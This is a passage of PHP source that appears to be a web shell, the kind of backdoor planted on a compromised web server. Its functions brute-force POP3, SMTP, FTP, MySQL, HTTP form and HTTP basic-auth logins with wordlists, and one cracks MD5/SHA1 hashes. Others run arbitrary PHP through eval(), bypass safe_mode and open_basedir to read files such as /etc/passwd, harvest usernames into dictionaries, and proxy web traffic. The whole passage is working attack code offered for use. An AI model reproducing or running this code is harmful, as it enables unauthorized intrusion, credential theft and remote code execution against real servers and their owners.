width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>"; } function pop3crackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $pop3=pop3logiN($target,$user,$pass); if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{ if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}} flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "<center>${t}POP3 cracker:$crack"; } function smtpcrackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $smtp=smtplogiN($target,$user,$pass,5); if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{ if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}} flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "<center>${t}SMTP cracker:$crack"; } function formcrackeR(){ global $errorbox,$footer,$et,$hcwd; if(!empty($_REQUEST['start'])){ $url=$_REQUEST['target']; $uf=$_REQUEST['userf']; $pf=$_REQUEST['passf']; $sf=$_REQUEST['submitf']; $sv=$_REQUEST['submitv']; $method=$_REQUEST['method']; $fail=$_REQUEST['fail']; $dic=$_REQUEST['dictionary']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer"); $dictionary=fopen($dic,'r'); echo "<font color=blue>Cracking started...<br>"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $url.="?$uf=$user&$pf=$pass&$sf=$sv"; $res=check_urL($url,$method,$fail,12); if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;} flusheR(); } fclose($dictionary); echo "Done!</font><br>"; } else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>"; } function hashcrackeR(){ global $errorbox,$t,$et,$hcwd; if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){ $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ $hash=strtoupper($_REQUEST['hash']); echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR(); $type=($_REQUEST['type']=='MD5')?'md5':'sha1'; while(!feof($dictionary)){ $word=trim(fgets($dictionary)," \n\r"); if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;} } echo "Done!</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; } function pr0xy(){ global $errorbox,$et,$footer,$hcwd; echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>"; if (!empty($_REQUEST['urL'])){ $dir=""; $u=parse_url($_REQUEST['urL']); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/'))); $url=@fsockopen($host, 80, $errno, $errstr, 12); if(!$url)die("<br>$errorbox Can not connect to host!$et$footer"); fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); while(!feof($url)){ $con = fgets($url); $con = str_replace("href=mailto","HrEf=mailto",$con); $con = str_replace("HREF=mailto","HrEf=mailto",$con); $con = str_replace("href=\"mailto","HrEf=\"mailto",$con); $con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con); $con = str_replace("href=\'mailto","HrEf=\"mailto",$con); $con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con); $con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); echo $con; } fclose($url); } } function mysqlclienT(){ global $t,$errorbox,$et,$hcwd; if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB']; $link = @mysql_connect($server,$user,$pass); if($link){ if (!empty($db))mysql_select_db($db); $result=mysql_query($query,$link); echo "${t}Query result(s):$et"; echo "<font color=blue><pre>"; while($data=mysql_fetch_row($result)){ foreach($data as $v) { echo $v; echo "\t"; } echo "\n"; } echo "</pre></font>"; mysql_close($link); } else{ echo "$errorbox Login failed!$et<br>"; } } echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>"; } function phpevaL(){ global $t,$hcwd; if (!empty($_REQUEST['code'])){ echo "<center><textarea rows=\"10\" cols=\"64\">"; $code = str_replace("<?php","",$_REQUEST['code']); $code = str_replace("<?","",$code); $code = str_replace("?>","",$code); htmlspecialchars(eval($code)); echo "</textarea></center><br>"; } echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>"; } function whoiS(){ global $t,$hcwd; if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){ $server =$_REQUEST['server']; $domain=$_REQUEST['domain']."\r\n"; $ser=fsockopen($server,43,$en,$es,5); fputs($ser,$domain); echo "<pre>"; while(!feof($ser))echo fgets($ser); echo "</pre>"; fclose($ser); } else{ echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>"; } } function hexvieW(){ if (!empty($_REQUEST['filE'])){ $f = $_REQUEST['filE']; echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>"; $file = fopen($f,"r"); $i= -1; while (!feof($file)) { $ln=''; $i++; echo "<tr><td width=\"10%\" bgcolor=\"#"; if ($i % 2==0) echo "666666";else echo "808080"; echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>"; echo "<td width=\"25%\" bgcolor=\"#"; if ($i % 2==0) echo "666666";else echo "808080"; echo "\">"; for ($j=0;$j<=7;$j++){ if (!feof($file)){ $tmp = strtoupper(dechex(ord(fgetc($file)))); if (strlen($tmp)==1) $tmp = "0".$tmp; echo $tmp." "; $ln.=$tmp; } } echo "</td><td width=\"25%\" bgcolor=\"#"; if ($i % 2==0) echo "666666";else echo "808080"; echo "\">"; for ($j=7;$j<=14;$j++){ if (!feof($file)){ $tmp = strtoupper(dechex(ord(fgetc($file)))); if (strlen($tmp)==1) $tmp = "0".$tmp; echo $tmp." "; $ln.=$tmp; } } echo "</td><td width=\"40%\" bgcolor=\"#"; if ($i % 2==0) echo "666666";else echo "808080"; echo "\">"; $n=0;$asc="";$co=0; for ($k=0;$k<=16;$k++){ $co=hexdec(substr($ln,$n,2)); if (($co<=31)||(($co>=127)&&($co<=160)))$co=46; $asc.= chr($co); $n+=2; } echo htmlspecialchars($asc); echo "</td></tr>"; } } fclose($file); echo "</table>"; } function safemodE(){ global $windows,$t,$hcwd; if (!empty($_REQUEST['file'])){ $i=1; echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n"; ini_restore("safe_mode");ini_restore("open_basedir"); $tmp = file_get_contents($_REQUEST['file']); echo $tmp; $i++; echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n"; $tmp=tempnam("","cx"); copy("compress.zlib://".$_REQUEST['file'], $tmp); $fh = fopen($tmp, "r"); $data = fread($fh, filesize($tmp)); fclose($fh); echo $data; $i++; if(function_exists("curl_init")){ echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n"; $fh = @curl_init("file://".$_REQUEST['file'].""); $tmp = @curl_exec($fh); echo $tmp; $i++; echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n"; $i++; if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR)) $ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__); else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__); curl_exec($ch); var_dump(curl_exec($ch)); } if($_REQUEST['file'] == "/etc/passwd"){ echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n"; for($uid=0;$uid<99999;$uid++){ $h=posix_getpwuid($uid); if (!empty($h))foreach($h as $v)echo "$v:";}} $i++; echo "</pre></font>"; } echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>"; } function crackeR(){ global $et; $cwd = getcwd(); echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>"; } function dicmakeR(){ global $errorbox,$windows,$footer,$t,$et,$hcwd; if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0; if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ $min = $_REQUEST['min']; $max = $_REQUEST['max']; if($max<$min)die($errorbox ."Bad input!$et". $footer); $s =$w=""; $out = $_REQUEST['output']; $r = ($_REQUEST['range']=='a' )?'a':'A'; if ($_REQUEST['range']==0) $r=0; for($i=0;$i<$min;$i++) $s.=$r; $dic = fopen($out,'a'); if(is_nan($r)){ while(strlen($s)<=$max){ $w = $s; if($combo)$w="$w:$w"; fwrite($dic,$w."\n"); $s++;} } else{ while(strlen($w)<=$max){ $w =(string)str_repeat("0",($min - strlen($s))).$s; if($combo)$w="$w:$w"; fwrite($dic,$w."\n"); $s++;} } fclose($dic); echo "<font color=blue>Done</font>"; } if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ $input=fopen($_REQUEST['input'],'r'); if (!$input){ if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; else{ $input=explode("\n",shelL("cat $input")); $output=fopen($_REQUEST['output'],'w'); if ($output){ foreach ($input as $in){ $user = $in; $user = trim(fgets($in)," \n\r"); if (!strstr($user,":"))continue; $user=substr($user,0,(strpos($user,':'))); if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); } fclose($input);fclose($output); echo "<font color=blue>Done</font>"; } } } else{ $output=fopen($_REQUEST['output'],'w'); if ($output){ while (!feof($input)){ $user = trim(fgets($input)," \n\r"); if (!strstr($user,":"))continue; $user=substr($user,0,(strpos($user,':'))); if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); } fclose($input);fclose($output); echo "<font color=blue>Done</font>"; } else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; } }elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ $res=downloadiT($_REQUEST['url'],$_REQUEST['output']); if($combo && $res){ $file=file($_REQUEST['output']); $output=fopen($_REQUEST['output'],'w'); foreach ($file as $v)fwrite($output,"$v:$v\n"); fclose($output); } echo "<font color=blue>Done</font>"; }else{ $temp=whereistmP(); echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";} } function calC(){ global $t,$et,$hcwd; $fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode'); if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){ echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">"; if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i}))); echo "</textarea>$et</center><br>"; } echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>"; } function authcrackeR(){ global $errorbox,$et,$t,$crack,$hcwd; if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $data=''; $method=($_REQUEST['method'])?'POST':'GET'; if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} spliturL($_REQUEST['target'],$host,$page); $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; if($method='GET')$page.=$data; $dictionary=fopen($_REQUEST['dictionary'],'r'); echo "<font color=blue>"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $so=fsockopen($host,80,$en,$es,5); if(!$so){echo "$errorbox Can not connect to host$et";break;} else{ $packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data); $packet.="\r\n\r\n"; $packet.=$data; fputs($so,$packet); $res=substr(fgets($so),9,2); fclose($so); if($res=='20')echo "U: $user P: $pass</br>"; flusheR(); } } echo "Done!</font>"; }else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; } function sqlcrackeR(){ global $errorbox,$t,$et,$crack; if (!function_exists("mysql_connect")){ echo "$errorbox Server does n`t support MySQL$et"; } else{ if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $sql=@mysql_connect($target,$user,$pass); if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;} flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } else{ echo "<center>${t}MySQL cracker:$crack"; } } } function ftpcrackeR(){ global $errorbox,$t,$et,$crack; if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et"; else{ if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;} if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;} ftp_close($ftp); flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } else echo "<center>${t}FTP cracker:$crack"; }} function openiT($name){ $ext=strtolower(substr($name,strrpos($name,'.')+1)); $src=array('php','php3','php4','phps','phtml','phtm','inc'); if(in_array($ext,$src))highlight_file($name); else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>"; } function logouT(){ setcookie('passw','',time()-10000); header('Location: '.hlinK()); } ?> <html> <head> <style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; 